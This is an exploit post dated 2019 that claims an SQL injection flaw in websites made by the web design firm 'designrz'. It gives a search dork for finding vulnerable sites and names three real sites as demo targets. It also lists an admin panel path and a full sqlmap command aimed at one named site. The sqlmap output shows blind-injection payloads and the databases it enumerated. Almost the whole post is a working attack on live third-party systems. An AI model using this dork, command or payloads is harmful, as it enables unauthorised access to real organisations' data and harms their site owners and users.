# Exploit Title:Website designed & developed by designrz. SQL Injection vulnerability
# Date:07.07.2019
# Dork:inurl:.php?id= intext:website designed & developed by designrz.
# Exploit Author:H9xHacker
# Tested on:Linux
Reverse check bing.com
ip:170.10.164.63 .php?id= (This server contains 236 domains)
#Demo
iskconamritsar.com/programs2.php?id=11
admissionoverseas.com/book-appointment.php?id=41
dcmgroup.in/education.php?id=7
# Admin control panel path
site/com/cms/index.php
# Poc:
sqlmap.py --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'www.iskconamritsar.com/programs2.php?id=24' --no-cast --batch --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6246' OR 9878=9878-- cSiP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=24' AND SLEEP(5)-- SiPf
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] iskconas_iskcon
----------------------------------
Greets:And All My Friends